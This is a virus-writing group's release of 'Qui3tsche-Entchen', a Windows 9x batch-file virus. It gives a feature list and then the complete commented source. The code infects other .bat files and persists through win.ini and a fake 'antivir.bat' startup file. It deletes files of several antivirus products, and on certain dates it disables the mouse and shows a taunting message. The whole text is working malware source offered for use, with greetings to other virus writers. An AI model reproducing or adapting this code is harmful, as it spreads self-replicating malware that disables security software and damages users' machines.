Pinoy Virus Writers proudly presents: 
 

"Qui3tsche-Entchen" by PhileT0a$t3r [rRlf]
*******************************************

                  000000
                 00000000  00     000000000
                 00    00  00    00000000000
                 00    00  00    00       00
                 00   000  00    00       00
       000000000000000000  00    00       00
    0000000000000000000    00    00      00
  00000          00        000000000000000
 0000          00000000    00000000000000
  0000       00000000000         00
    000      000 00   0000       00
     000   000   00     0000     00
      000 000    00       0000   00
       0000      00         0000 00
        00       00           00000
                 00              00
                 00

             www.rRlf.de

This is my fourth Virus (2001, summer). It is my second Batch-ViRii, a better follow-up model of "Black Day phinal". OK, here it is: 

bat-infector 
parasitic 
residency through win.ini 
securing the residency through a separate Batch-file in the Startup-directory 
retro: F-Prot 95, McAfee, Thunderbyte, Norton AntiVirus 2000 (newest version, it does not recognize the virus, even if heuristic is at maximum) 
uses ".."-method to change directories 
copies itself as call-back to the root-directory 
hidden backup in the windows-directory 
payload: every 5./8./17./23. of a month the mouse gets deactivated, and a "Quietsche-Entchen" (a yellow duck made of plastic, that squeaks when you press it) appears on the screen, which tells the user, that his mouse does not work 
full compatible to Windows ME, Windows 98, Windows 95 (long enough tested) 
size: 3.619 Bytes 
Gr33tz go t0: 545!, dr.g0nZo [rRlf], El DudErin0 [rRlf], pRe4Ch_0_23 [rRlf], rastafarie [rRlf], Zoom23 [PVW], Necronomikon, SnakeByte, Zarrmann, 648!, El Commandante, Karotte & Gurke, fir3nz3 z00l, ZGBB, Mindjuice. 

Well, here comes the (not very detailed) commented script (comments marked with "-->"; phile-name: qui3tsch.bat): 

@if '%_qui3tsch%==' goto _qui3tsch

-->here goes the host

@if not '%_qui3tsch%==' goto q3eend
:_qui3tsch q3e
@echo off%_q3e%
if '%1=='q3e goto q3e%2
set q3e=%0.bat
if not exist %q3e% set q3e=%0
if '%q3e%==' set q3e=autoexec.bat
set !q3e=%1 %2 %3 %4 %5 %6 %7 %8 %9
if exist c:\_q3e.bat goto q3eg
if exist %q3e% goto q3efe
call %q3e% q3e h %path%
if exist %q3e% goto q3efe
goto eq3e
:q3eh
shift%_q3e%
if '%2==' goto q3eend
if exist %2\%q3e% set q3e=%2\%q3e%
if exist %2%q3e% set q3e=%2%q3e%
if exist %2\%q3e%.bat set q3e=%2\%q3e%.bat
if exist %2%q3e%.bat set q3e=%2%q3e%.bat
if not exist %q3e% goto q3eh
goto q3eend

-->quite normal infection-routine, part 1 (above)

:q3efe
find "q3e"c:\_q3e.bat
attrib c:\_q3e.bat +h

-->call-back (above)

:q3eg
command /c c:\_q3e q3e vir
:eq3e
:r3tr0q3e
ctty nul.q3e
if exist c:\_q3e.bat del c:\programme\norton~1\s32integ.dll
if exist c:\_q3e.bat del c:\programme\f-prot95\fpwm32.dll
if exist c:\_q3e.bat del c:\programme\mcafee\scan.dat
if exist c:\_q3e.bat del c:\tbavw95\tbscan.sig

-->retro-routine (above)

if exist c:\windows\startmenÂ\programme\autostart\antivir.bat goto r3sid3ncyq3e
copy qui3tsch.bat c:\windows\q3e.sys

-->hidden backup (above)

echo>q3e1.bat @echo off
echo>q3e2.bat ctty nul
echo>q3e3.bat if exist c:\windows\system\qui3tsch.bat goto ok
echo>q3e4.bat copy c:\windows\q3e.sys c:\windows\system\qui3tsch.bat
echo>q3e5.bat :ok
copy q3e1.bat + q3e2.bat + q3e3.bat + q3e4.bat + q3e5.bat c:\windows\startmen \programme\autostart\antivir.bat
del q3e1.bat
del q3e2.bat
del q3e3.bat
del q3e4.bat
del q3e5.bat

-->residency-security-Batch in the Startup-directory (above)

:r3sid3ncyq3e
if exist c:\windows\system\qui3tsch.bat goto q3ephuck
copy qui3tsch.bat c:\windows\system
attrib +h c:\windows\system\qui3tsch.bat
copy qui3tsch.bat + c:\windows\win.ini c:\windows\system\win.ini
del c:\windows\win.ini
move c:\windows\system\win.ini c:\windows
goto q3ephuck

-->residency-routine (above)

-->this will be added into win.ini (below)


[windows]
load=c:\windows\system\qui3tsch.bat
run=C:\WINDOWS\SYSTEM\cmmpu.exe
NullPort=None


-->checks the current date (below)

:q3ephuck
if exist c:\_q3e.bat ctty con
echo.|date|find "5">nul.q3e
if errorlevel 1 goto 8q3e
goto p4ylo4dq3e
:8q3e
echo.|date|find "8">nul.q3e
if errorlevel 1 goto 17q3e
goto p4ylo4dq3e
:17q3e
echo.|date|find "17">nul.q3e
if errorlevel 1 goto 23q3e
goto p4ylo4dq3e
:23q3e
echo.|date|find "23">nul.q3e
if errorlevel 1 goto naq3e
:p4ylo4dq3e
ctty nul.q3e

-->deactivation of the mouse (below)

if exist c:\_q3e.bat c:\windows\rundll32.exe mouse,disable

-->"grafic" appears; the text says: "Quietsch, Qui3tsch !
   Your mouse seems to be damaged. You should buy a new one." (below)

if exist c:\_q3e.bat ctty con
echo%_q3e%                                     ______________________________________
echo%_q3e%                       _____         I       Quietsch, Qui3tsch !         I
echo%_q3e%                      /     \        I Deine Maus scheint kaputt zu sein. I
echo%_q3e%                     /   () ()       I  Du solltest dir eine neue kaufen. I
echo%_q3e%                     I     ~~~~~\    //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo%_q3e%       _             \     _____/   /
echo%_q3e%      / \             I     /
echo%_q3e%     /   \____________/     \
echo%_q3e%     I                       \
echo%_q3e%     \      ____/~~~~~\       \
echo%_q3e%      \    \          I       I
echo%_q3e%       \    \________/       /
echo%_q3e%        \___________________/
echo%_q3e% .
echo%_q3e%        ja, das ist ein "Quietsche-Entchen" ... by PhileT0a$t3r [rRlf]
pause.q3e

-->quite normal infection-routine, part 2 (below)

:naq3e
call %q3e% q3e rh
set _qui3tsch=>nul.q3e
set !q3e=
set q3e=
goto q3eend
:q3erh
set _qui3tsch=x%_q3e%
%q3e% %!q3e%
:q3evir
for %%a in (*.bat ..\*.bat c:*.bat) do call c:\_q3e q3e i %%a
exit q3e
:q3ei
find "q3e"<%3>nul
if not errorlevel 1 goto q3eend
echo @if '%%_qui3tsch%%==' goto _qui3tsch>q3e$
type %3>>q3e$
echo.>>q3e$
type c:\_q3e.bat>>q3e$
move q3e$ %3>nul
exit q3e
:q3eend


The one, who wants to have a more detailed commented script should go to www.rRlf.de and get "Black Day phinal", the quite similar predecessor-Virus (but not as good as this one). Within that package is a fully commented script. 
 

